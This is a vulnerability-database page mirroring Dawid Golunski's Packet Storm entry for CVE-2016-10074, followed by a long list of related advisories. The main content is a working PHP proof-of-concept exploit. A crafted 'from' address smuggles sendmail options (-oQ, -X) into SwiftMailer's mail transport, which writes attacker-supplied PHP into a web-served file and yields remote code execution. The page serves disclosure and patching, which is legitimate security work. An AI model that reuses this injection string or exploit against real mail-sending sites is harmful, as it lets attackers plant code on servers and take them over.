Lucene search
Dawid GolunskiPACKETSTORM:140290HistoryDec 29, 2016 - 12:00 a.m.
SwiftMailer Remote Code Execution
2016-12-2900:00:00
Dawid Golunski
packetstormsecurity.com
48
0.944 High
EPSS
Percentile
99.2%
`<?php
/*
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
Discovered/Coded by:
Dawid Golunski
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
Exploit code URL:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt
Follow the feed for updates:
https://twitter.com/dawid_golunski
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == ["@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
See the full advisory URL for the exploit details.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// ------------------
// mail() param injection via the vulnerability in SwiftMailer
require_once 'lib/swift_required.php';
// Mail transport
$transport = Swift_MailTransport::newInstance();
// Create the Mailer using your created Transport
$mailer = Swift_Mailer::newInstance($transport);
// Create a message
$message = Swift_Message::newInstance('Swift PoC exploit')
->setFrom(array($email_from => 'PoC Exploit Payload'))
->setTo(array('[email protected]', '[email protected]' => 'A name'))
->setBody('Here is the message itself')
;
// Send the message with PoC payload in 'from' field
$result = $mailer->send($message);
?>
`
Related
saint
saint
Swift Mailer PwnScriptum Command Injection
2017-01-17 00:00:00
Swift Mailer PwnScriptum Command Injection
2017-01-17 00:00:00
Swift Mailer PwnScriptum Command Injection
2017-01-17 00:00:00
nessus
nessus
Debian DSA-3769-1 : libphp-swiftmailer - security update
2017-01-23 00:00:00
Fedora 25 : php-swiftmailer (2016-f7ef82c1b4)
2017-01-10 00:00:00
Fedora 24 : php-swiftmailer (2016-b65e546846)
2017-01-10 00:00:00
osv
osv
libphp-swiftmailer - security update
2017-01-22 00:00:00
libphp-swiftmailer - security update
2017-01-19 00:00:00
CVE-2016-10074
2016-12-30 19:59:00
openvas
openvas
SwiftMailer RCE Vulnerability
2016-12-29 00:00:00
Debian: Security Advisory (DSA-3769-1)
2017-01-21 00:00:00
Debian: Security Advisory (DLA-792-1)
2023-03-08 00:00:00
fedora
fedora
[SECURITY] Fedora 25 Update: php-swiftmailer-5.4.5-1.fc25
2017-01-09 00:59:18
[SECURITY] Fedora 24 Update: php-swiftmailer-5.4.5-1.fc24
2017-01-09 01:22:20
prion
prion
Command injection
2016-12-30 19:59:00
veracode
veracode
Arbitrary Code Execution
2018-05-10 03:25:41
nvd
nvd
CVE-2016-10074
2016-12-30 19:59:00
debian
debian
[SECURITY] [DLA 792-1] libphp-swiftmailer security update
2017-01-19 18:51:46
[SECURITY] [DSA 3769-1] libphp-swiftmailer security update
2017-01-22 10:43:02
[SECURITY] [DSA 3769-1] libphp-swiftmailer security update
2017-01-22 10:43:02
zdt
zdt
SwiftMailer 5.4.5-DEV - Remote Code Execution Exploit
2016-12-29 00:00:00
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution Exploit
2017-06-22 00:00:00
github
github
Flow Swift Mailer package Remote code execution
2024-05-17 23:06:50
Swift Mailer mail transport Command Injection
2022-05-17 00:27:49
f5
f5
K46057232 : Swift Mailer vulnerability CVE-2016-10074
2017-02-14 00:00:00
cvelist
cvelist
CVE-2016-10074
2016-12-30 19:00:00
typo3
typo3
Remote Code Execution in third party library swiftmailer
2017-01-03 00:00:00
debiancve
debiancve
CVE-2016-10074
2016-12-30 19:59:00
exploitpack
exploitpack
SwiftMailer 5.4.5-DEV - Remote Code Execution
2016-12-28 00:00:00
PHPMailer 5.2.20 SwiftMailer 5.4.5-DEV Zend Framework zend-mail 2.4.11 - AIO PwnScriptum Remote Code Execution
2017-01-02 00:00:00
PHPMailer 5.2.20 with Exim MTA - Remote Code Execution
2017-06-21 00:00:00
cve
cve
CVE-2016-10074
2016-12-30 19:59:00
ubuntucve
ubuntucve
CVE-2016-10074
2016-12-30 00:00:00
friendsofphp
friendsofphp
Remote Code Execution when using the mail transport
2016-12-29 10:01:58
exploitdb
exploitdb
SwiftMailer < 5.4.5-DEV - Remote Code Execution
2016-12-28 00:00:00
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
2017-01-02 00:00:00
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
2017-06-21 00:00:00
seebug
seebug
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
2016-12-30 00:00:00
WordPress Core 4.6 - Unauthenticated Remote Code Execution
2017-05-04 00:00:00
packetstorm
packetstorm
WordPress Core 4.6 Unauthenticated Remote Code Execution
2017-05-05 00:00:00
PHPMailer / Zend-mail / SwiftMailer Remote Code Execution
2017-01-03 00:00:00
SquirrelMail 1.4.22 Remote Code Execution
2017-04-23 00:00:00
thn
thn
Critical Updates — RCE Flaws Found in SwiftMailer, PhpMailer and ZendMail
2017-01-02 23:45:00
threatpost
threatpost
